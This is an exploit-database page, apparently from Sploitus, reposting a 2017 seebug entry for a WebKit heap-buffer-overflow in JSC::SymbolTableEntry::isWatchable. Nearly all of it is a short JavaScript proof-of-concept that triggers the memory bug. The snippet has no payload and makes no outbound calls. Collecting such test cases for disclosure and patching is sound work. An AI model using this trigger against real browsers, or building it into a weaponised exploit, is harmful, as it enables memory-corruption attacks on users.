Sploitus

Exploit for WebKit: heap-buffer-overflow in JSC::SymbolTableEntry::isWatchable

seebug Β· 2017-04-07

Exploit Code

MARKDOWN14 lines
## https://sploitus.com/exploit?id=SSV:92919
(function (x = 0) {
    var a;
    {
        function arguments() {
        }
        function b() {
            var g = 1;
            a[5];
        }
        f();
        g();
    }
}());